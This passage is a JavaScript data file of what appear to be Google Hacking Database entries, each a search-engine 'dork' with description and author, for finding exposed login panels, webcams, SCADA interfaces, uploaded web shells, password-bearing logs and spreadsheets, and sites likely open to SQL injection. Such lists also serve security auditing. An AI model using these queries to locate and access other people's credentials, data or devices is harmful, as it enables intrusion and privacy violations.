Monarch\"intext:\"Job Monarch version \"intext:\"Jobarchive\" intext:\"runningtime\"inurl:\"/addons/job_monarch\" -oss.trac.surfsara.nl\"Ganglia Web Frontend version 3.5.0\" - Comment: just tweak the version 3.5.0 to any valid Ganglia Web Frontend version to get results targeted to a specific version.", "submited": "2015-09-01", "request": "\"ganglia mobile.php\"", "id": 4066}, {"short description": "inurl:\"/cms/app/webroot\"", "long description": "inurl:\"/cms/app/webroot\"Author:ShockvaWe (mrnoone)ozum", "submited": "2015-09-01", "request": "inurl:\"/cms/app/webroot\"", "id": 4067}, {"short description": "intitle:\"IPCam\" inurl:monitor2.htm", "long description": "EasyN IP webcam WebUI.Category: Various Online devices- Fitzl Csaba", "submited": "2015-09-02", "request": "intitle:\"IPCam\" inurl:monitor2.htm", "id": 4068}, {"short description": "inurl:browse.php inurl:kcfinder -github.com", "long description": "Panels of files for kcfinder Software. Have fun!.Dork by Rootkit Pentester.", "submited": "2015-09-02", "request": "inurl:browse.php inurl:kcfinder -github.com", "id": 4069}, {"short description": "inurl:xampp inurl:perlinfo.pl ext:pl", "long description": "Panels with a lot of data for webservers.Dork by Rootkit Pentester.", "submited": "2015-09-02", "request": "inurl:xampp inurl:perlinfo.pl ext:pl", "id": 4070}, {"short description": "site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup", "long description": "Dork :site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backupThis Will help to grab the Backup and old file of the (.gov and .edu)Website'sBy : Mishra Dhiraj (D)", "submited": "2015-09-02", "request": "site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup", "id": 4071}, {"short description": "site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini", "long description": "Dork;site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:iniThis dork will search for any configuration files a target or targets mayhave.You can change in site:target.com - to target:edu (for education targets)By Kevin Mark", "submited": "2015-09-07", "request": "site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini", "id": 4072}, {"short description": "intitle:\"Index of\" \"WhatsApp Databases\"", "long description": "this dork find db.crypt/.db files of whatsapp conversationsyou can open them withhttps://code.google.com/p/hotoloti/downloads/detail?name=Whatsapp_Xtract_V2.1_2012-05-10-2.zip&amp;thanks to pmbento--acid_burn9X", "submited": "2015-09-07", "request": "intitle:\"Index of\" \"WhatsApp Databases\"", "id": 4073}, {"short description": "intitle:Logon  OrderCloud ui/logon.aspx", "long description": "Four51 OrderCloud Company cloud software.OrderCloud for shopping websites Login.-Xploit", "submited": "2015-09-07", "request": "intitle:Logon  OrderCloud ui/logon.aspx", "id": 4074}, {"short description": "inurl:\"/wap/LoginPolicy.jsp\"", "long description": "Stoneware webnetwork CloudAllows for Portal Cloud login.-Xploit", "submited": "2015-09-07", "request": "inurl:\"/wap/LoginPolicy.jsp\"", "id": 4075}, {"short description": "inurl:\"remote.php/webdav\" -site:owncloud.org", "long description": "Category: Pages Containin Login PortalsAuthor: Felipe Molina (@femoltor)Owncloud WebDav login", "submited": "2015-09-10", "request": "inurl:\"remote.php/webdav\" -site:owncloud.org", "id": 4076}, {"short description": "intitle:\"Index.of\" \"attachments\"", "long description": "Directories with interesting info.Have Fun Responsible.Dork by Rootkit Pentester.", "submited": "2015-09-10", "request": "intitle:\"Index.of\" \"attachments\"", "id": 4077}, {"short description": "intitle:\"Whoops! There was an error.\"", "long description": "These error pages can contain database credentials.contact: @geoffreyvdberge", "submited": "2015-09-11", "request": "intitle:\"Whoops! There was an error.\"", "id": 4078}, {"short description": "inurl:sh311Z/c99/", "long description": "Through this shell you can find c99 shells uploaded on websites", "submited": "2015-09-15", "request": "inurl:sh311Z/c99/", "id": 4079}, {"short description": "intitle:\"WebService Web Service\" ext:asmx", "long description": "Servers with \"Web Service commands activated\".Dork by Rootkit Pentester.", "submited": "2015-09-15", "request": "intitle:\"WebService Web Service\" ext:asmx", "id": 4080}, {"short description": "intitle:Content Server Error IdcService=DOC_INFO", "long description": "Oracle WebCenter ContentContent Server Error-Xploit", "submited": "2015-09-17", "request": "intitle:Content Server Error IdcService=DOC_INFO", "id": 4081}, {"short description": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"", "long description": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"Here is a list of files and directories in your public_html folder, it bypass directory-listening restriction.Silent_z3r0Pakistan Cyber Army", "submited": "2015-09-17", "request": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"", "id": 4082}, {"short description": "site:ws.kik.com | site:ws2.kik.com k=", "long description": "Google Dork: site:ws.kik.com | site:ws2.kik.com k=Date: September 16th, 2015Exploit Author: Matthew BlankenshipDescription: Shows usernames, emails, and verification tokens for kik messenger accounts.", "submited": "2015-09-18", "request": "site:ws.kik.com | site:ws2.kik.com k=", "id": 4083}, {"short description": "inurl:printer/main.html", "long description": "This Dork reveals a lot of Printers Panels.Enjoy with moderation xD.This Dork is discovered by Rootkit Pentester.", "submited": "2015-09-24", "request": "inurl:printer/main.html", "id": 4084}, {"short description": "intitle:Oracle PeopleSoft Sign-in \"Oracle\" Sign-in \"error\"", "long description": "Oracle PeopleSoft Sign-inLogins-Xploit", "submited": "2015-09-28", "request": "intitle:Oracle PeopleSoft Sign-in \"Oracle\" Sign-in \"error\"", "id": 4085}, {"short description": "inurl:imapuser Mail :: Welcome to Horde imp login.php password", "long description": "Mail :: Welcome to HordeGives usernames on Horde email websites and other email websites as well.-Xploit", "submited": "2015-10-05", "request": "inurl:imapuser Mail :: Welcome to Horde imp login.php password", "id": 4086}, {"short description": "intitle:Global Traffic Statistics \"Ntop\"", "long description": "Google dork Description: View Global Traffic StatisticsGoogle search: intitle:Global Traffic Statistics \"Ntop\"Submited: 2015-10-3Note:Ntop shows the current network usage. It displays a list of hosts thatare currently using the network and reports information concerning theIP (Internet Protocol) traffic generated by each host.", "submited": "2015-10-05", "request": "intitle:Global Traffic Statistics \"Ntop\"", "id": 4087}, {"short description": "inurl:axis.cgi ext:cgi", "long description": "Dork for all axis cams. Enjoy with them!.These Dork is Discovered by Rootkit Pentester.", "submited": "2015-10-06", "request": "inurl:axis.cgi ext:cgi", "id": 4088}, {"short description": "inurl:webvisu.htm ext:htm", "long description": "Google dork Description: View SCADA web visual interfaceGoogle search: inurl:webvisu.htm ext:htmSubmited: 2015-10-8Note:SCADA web visual. - Yudha[at]glosmon.com", "submited": "2015-10-15", "request": "inurl:webvisu.htm ext:htm", "id": 4089}, {"short description": "intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3", "long description": "Login for&nbsp;Parallels Plesk Panel for Microsoft Windows-Xploit", "submited": "2015-10-15", "request": "intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3", "id": 4090}, {"short description": "inurl:agc/vicidial.php", "long description": "This reveals the version of vicidial used and gives the access changing to/agc/vicidial.php to vicidial/admin.php to give the direct access to adminlogin page .", "submited": "2015-10-15", "request": "inurl:agc/vicidial.php", "id": 4091}, {"short description": "inurl:\"/web-console/\" intitle:\"Administration Console\"", "long description": "JBoss Application Server Info-Xploit", "submited": "2015-10-15", "request": "inurl:\"/web-console/\" intitle:\"Administration Console\"", "id": 4092}, {"short description": "mail spool intitle:index.of", "long description": "Dork for mail spools.Decoy", "submited": "2015-10-16", "request": "mail spool intitle:index.of", "id": 4093}, {"short description": "private parent intitle:index.of", "long description": "http://www.google.com/search?q=private parent intitle:index.ofDork for all sorts of juicy stuff!Decoy", "submited": "2015-10-16", "request": "private parent intitle:index.of", "id": 4094}, {"short description": "inurl:users intitle:index.of", "long description": "http://www.google.com/search?q=inurl:users intitle:index.ofUser folders containing interesting files.Decoy", "submited": "2015-10-16", "request": "inurl:users intitle:index.of", "id": 4095}, {"short description": "inurl:/my.logon.php3?", "long description": "f5 Network Remote Access Logins-Xploit", "submited": "2015-10-16", "request": "inurl:/my.logon.php3?", "id": 4096}, {"short description": "inurl:.listing intitle:index.of", "long description": "Directories with .listing files.By Rootkit Pentester.", "submited": "2015-10-19", "request": "inurl:.listing intitle:index.of", "id": 4097}, {"short description": "inurl:.DS_Store intitle:index.of", "long description": "Directories with DS_Store files.By Rootkit Pentester.", "submited": "2015-10-19", "request": "inurl:.DS_Store intitle:index.of", "id": 4098}, {"short description": "inurl:/aspnet_client/system_web/", "long description": "Google dork Description: Juice Directory \"ASP\"Google search: inurl:/aspnet_client/system_web/Note:Juice Directory. - Yudha[at]glosmon.com", "submited": "2015-10-19", "request": "inurl:/aspnet_client/system_web/", "id": 4099}, {"short description": "\"sql\" \"parent\" intitle:index.of -injection", "long description": "Directories containing SQL Installs and/or SQL databases...Decoy", "submited": "2015-10-20", "request": "\"sql\" \"parent\" intitle:index.of -injection", "id": 4100}, {"short description": "inurl:cgi-bin/webproc?getpage=", "long description": "inurl:cgi-bin/webproc?getpage=https://www.exploit-db.com/exploits/38488/By JeJe Plus", "submited": "2015-10-20", "request": "inurl:cgi-bin/webproc?getpage=", "id": 4101}, {"short description": "filetype:log intext:password | pass | pw", "long description": "http://www.google.com/search?q=filetype:log intext:password | pass | pwLog files containing passwords...Decoy", "submited": "2015-10-22", "request": "filetype:log intext:password | pass | pw", "id": 4102}, {"short description": "\"My Documents\" \"parent\" intitle:index.of", "long description": "http://www.google.com/search?q=\"My Documents\" \"parent\" intitle:index.of\"My Documents\" folders shared on the interwebs...Decoy", "submited": "2015-10-22", "request": "\"My Documents\" \"parent\" intitle:index.of", "id": 4103}, {"short description": "\"Desktop\" parent intitle:index.of", "long description": "http://www.google.com/search?q=\"Desktop\" parent intitle:index.ofDesktops shared on the interwebs...Decoy", "submited": "2015-10-22", "request": "\"Desktop\" parent intitle:index.of", "id": 4104}, {"short description": "inurl:webgps intitle:\"GPS Monitoring System\"", "long description": "Login page for GPS monitoring systems.Author: Manuel Mancera (sinkmanu)", "submited": "2015-10-26", "request": "inurl:webgps intitle:\"GPS Monitoring System\"", "id": 4105}, {"short description": "inurl:etc -intext:etc ext:passwd", "long description": "Files with a lot of passwords. Enjoy healthy!.Dork by Rootkit Pentester.", "submited": "2015-10-28", "request": "inurl:etc -intext:etc ext:passwd", "id": 4106}, {"short description": "intitle:index.of parent inurl:repos", "long description": "http://www.google.com/search?q=intitle:index.of parent inurl:reposShared repositories. Very interesting...Decoy", "submited": "2015-10-30", "request": "intitle:index.of parent inurl:repos", "id": 4107}, {"short description": "intitle:index.of inurl:grades site:edu", "long description": "Directories containing grades.Decoy", "submited": "2015-11-02", "request": "intitle:index.of inurl:grades site:edu", "id": 4108}, {"short description": "\"Build ref: 26\"", "long description": "Google Dork Description: Automatic Number Plate Recognition Systems (ANPRs)CamerasGoogle Search: \"Build ref: 26\"Vendor: PIPS Technology (3M)http://www.roadtraffic-technology.com/contractors/photo_enforcement/pips-technologyListing of ANPRs/ALPRs cameras.John Jolly", "submited": "2015-11-03", "request": "\"Build ref: 26\"", "id": 4109}, {"short description": "\"powered by joomla 3.2\" OR \"powered by joomla 3.3\" OR \"powered by joomla 3.4\"", "long description": "Search for all websites built on specific versions of Joomla CMS . Thesespecific versions of Joomla could potentially be vulnerableto the SQL injection attack (CVE-2015-7297) .ThanksDheerajhttps://www.linkedin.com/in/dheerajrnhttps://www.facebook.com/dheeraj.pro", "submited": "2015-11-03", "request": "\"powered by joomla 3.2\" OR \"powered by joomla 3.3\" OR \"powered by joomla 3.4\"", "id": 4110}, {"short description": "intitle:\"Solr Admin\" \"Core Admin\" \"Thread Dump\"", "long description": "Apache Solr admin interfaces.- Andy G - twitter.com/vxhex", "submited": "2015-11-05", "request": "intitle:\"Solr Admin\" \"Core Admin\" \"Thread Dump\"", "id": 4111}, {"short description": "ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD", "long description": "Dork who collects a lot of data in excel file.By Rootkit Pentester.", "submited": "2015-11-06", "request": "ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD", "id": 4112}, {"short description": "intitle:index.of inurl:openwebmail -site:openwebmail.org", "long description": "Sites with openwebmail installs.Decoy", "submited": "2015-11-09", "request": "intitle:index.of inurl:openwebmail -site:openwebmail.org", "id": 4113}, {"short description": "inurl:portal | intitle:portal (\"login\" | \"logon\" | \"admin\") inurl:patient | intitle:patient", "long description": "Patient Health Portals.Decoy", "submited": "2015-11-09", "request": "inurl:portal | intitle:portal (\"login\" | \"logon\" | \"admin\") inurl:patient | intitle:patient", "id": 4114}, {"short description": "inurl:\"http://cms\" | inurl:\"https://cms\" (\"login\" | \"logon\" | \"admin\") -school", "long description": "Content Manager Login Pages.Decoy", "submited": "2015-11-09", "request": "inurl:\"http://cms\" | inurl:\"https://cms\" (\"login\" | \"logon\" | \"admin\") -school", "id": 4115}, {"short description": "intitle:\"SmarterMail Login\" inurl:\"/Login.aspx\"", "long description": "Login for SmarterMail Enterprise-Xploit", "submited": "2015-11-10", "request": "intitle:\"SmarterMail Login\" inurl:\"/Login.aspx\"", "id": 4116}, {"short description": "intitle:\"Dashboard [Jenkins]\" Credentials", "long description": "Find Jenkins websites which do not require authentication to possiblyretrieve credentials and obtain remote command execution.Vulnerability: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html- Th3R3p0", "submited": "2015-11-10", "request": "intitle:\"Dashboard [Jenkins]\" Credentials", "id": 4117}, {"short description": "inurl:\"wp-content/uploads/private\"", "long description": "Directories with juicy data.Dork by Rootkit Pentester.", "submited": "2015-11-11", "request": "inurl:\"wp-content/uploads/private\"", "id": 4118}, {"short description": "ext:sql intext:username intext:password", "long description": "search turns up database files with cleartext and encryption, often leadingto open directory structures and configuration files.", "submited": "2015-11-11", "request": "ext:sql intext:username intext:password", "id": 4119}, {"short description": "inurl:pipermail intitle:index.of parent", "long description": "Pipermail ArchivesDecoy", "submited": "2015-11-11", "request": "inurl:pipermail intitle:index.of parent", "id": 4120}, {"short description": "inurl:\"https://blackboard\" | inurl:\"http://blackboard\"", "long description": "Blackboard Login Portals.Decoy", "submited": "2015-11-11", "request": "inurl:\"https://blackboard\" | inurl:\"http://blackboard\"", "id": 4121}, {"short description": "inurl:\"http://canvas\" | inurl:\"https://canvas\" | intitle:\"Log In to Canvas\"", "long description": "Canvas login portals.Decoy", "submited": "2015-11-11", "request": "inurl:\"http://canvas\" | inurl:\"https://canvas\" | intitle:\"Log In to Canvas\"", "id": 4122}, {"short description": "intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "long description": "Spreadsheets with pop3 and smtp login details.Decoy", "submited": "2015-11-11", "request": "intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "id": 4123}, {"short description": "inurl:\"ftp\" intext:\"user\" | \"username\" | \"userID\" | \"user ID\" | \"logon\" |\"login\" intext:\"password\" | \"passcode\" filetype:xls | filetype:xlsx", "long description": "Passwords :DDecoy", "submited": "2015-11-11", "request": "inurl:\"ftp\"\n intext:\"user\" | \"username\" | \"userID\" | \"user ID\" | \"logon\" | \"login\" intext:\"password\" | \"passcode\" filetype:xls | filetype:xlsx", "id": 4124}, {"short description": "intitle:\"Workspace Login\" intext:\"WinOcular WorkSpace\"", "long description": "WinOcular Workspace Login portals.Decoy", "submited": "2015-11-11", "request": "intitle:\"Workspace Login\" intext:\"WinOcular WorkSpace\"", "id": 4125}, {"short description": "intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "long description": "Files with Passwords of http and https servers in format xls and xlsx.Enjoy well.Dork By Rootkit Pentester.", "submited": "2015-11-12", "request": "intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "id": 4126}, {"short description": "intext:\"This is Apache Hadoop release\" \"Local Logs\"", "long description": "Google dork Description: bypass information Apache Hadoop ServiceGoogle search: intext:\"This is Apache Hadoop release\" \"Local Logs\"Submited: 2015-11-12Note:view Hadoop information. - Yudha[at]glosmon.com", "submited": "2015-11-12", "request": "intext:\"This is Apache Hadoop release\" \"Local Logs\"", "id": 4127}, {"short description": "intitle:\"router\"inurl:\"home.asp\"", "long description": "Few routers that can be accessed without login", "submited": "2015-11-12", "request": "intitle:\"router\"inurl:\"home.asp\"", "id": 4128}, {"short description": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php", "long description": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php| inurl:.us/wp-login.php", "submited": "2015-11-13", "request": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php", "id": 4129}, {"short description": "intitle:AP Router New Generation | inurl:/home.asp", "long description": "Access Point Router Logins-Xploit", "submited": "2015-11-13", "request": "intitle:AP Router New Generation | inurl:/home.asp", "id": 4130}, {"short description": "\" Proudly Served by LiteSpeed Web Server\" intitle:index.of./", "long description": "Servers with vulnerability who exploit in this link:https://www.exploit-db.com/exploits/13850/Dork by Rootkit Pentester.", "submited": "2015-11-13", "request": "\" Proudly Served by LiteSpeed Web Server\" intitle:index.of./", "id": 4131}, {"short description": "intitle:index.of.mail", "long description": "Dork with juicy info. Enjoy xD.Dork by Rootkit Pentester.", "submited": "2015-11-13", "request": "intitle:index.of.mail", "id": 4132}, {"short description": "intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl", "long description": "Numara Software FootPrints Logins", "submited": "2015-11-16", "request": "intitle:FootPrints Login | inurl:/MRcgi/MRentrancePage.pl", "id": 4133}, {"short description": "intext:\"Roundcube Webmail\" intitle:\"Welcome to Roundcube Webmail\" -site:roundcube.net", "long description": "Roundcube Webmail Login Portals.Decoy", "submited": "2015-11-19", "request": "intext:\"Roundcube Webmail\" intitle:\"Welcome to Roundcube Webmail\" -site:roundcube.net", "id": 4134}, {"short description": "intitle:Tomcat Status | inurl:/status?full=true", "long description": "JBOSS / Tomcat Status IP info-Xploit", "submited": "2015-11-19", "request": "intitle:Tomcat Status | inurl:/status?full=true", "id": 4135}, {"short description": "intitle:\"Mail - AfterLogic WebMail\"", "long description": "AfterLogic WebMail Login Portals.Decoy", "submited": "2015-11-19", "request": "intitle:\"Mail - AfterLogic WebMail\"", "id": 4136}, {"short description": "inurl:index.php?id= intext:\"mysql_fetch_array\"", "long description": "here's a dork to find sql injectable sites in general.inurl can be replaced to something different...thx,Denis Muhic", "submited": "2015-11-23", "request": "inurl:index.php?id= intext:\"mysql_fetch_array\"", "id": 4137}, {"short description": "-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank", "long description": "Lots of interesting stuff!Decoy", "submited": "2015-11-23", "request": "-inurl:http | -inurl:https inurl:ftp ext:xls | ext:xlsx bank", "id": 4138}, {"short description": "inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm", "long description": "Dork who show cams of traffic of a lot of cities.Dork By Rootkit Pentester.", "submited": "2015-11-26", "request": "inurl:trafficcams -intext:trafficcams ext:asp OR ext:htm", "id": 4139}, {"short description": "intext:\"GET http://\" ext:txt intext:\"password\" inurl:log", "long description": "this dork will return password sent in GET request from proxies logs.submitted by: Mohammad Al-Nasser", "submited": "2015-11-30", "request": "intext:\"GET http://\" ext:txt intext:\"password\" inurl:log", "id": 4140}, {"short description": "inurl:net/net/airprint.html", "long description": "Title: inurl:net/net/airprint.htmlDescription : This dork can access many printers without login.By Sivabalan", "submited": "2015-11-30", "request": "inurl:net/net/airprint.html", "id": 4141}, {"short description": "inurl:/net/net/protocol.html", "long description": "Title: inurl:/net/net/protocol.htmlDescription: This dork can access many printers without loginBy Sivabalan", "submited": "2015-11-30", "request": "inurl:/net/net/protocol.html", "id": 4142}, {"short description": "inurl:\"trace\" ext:axd intext:\"password\"", "long description": "the dork keyword is:inurl:\"trace\" ext:axd intext:\"password\"purpose of dork:search for tracing files in the ASP.NET websites which might contain asensitive information such as the username and password entered to theapplication.discovered by: Asem Al Husaini (SFDA)", "submited": "2015-12-01", "request": "inurl:\"trace\" ext:axd intext:\"password\"", "id": 4143}]
};

module.exports = db;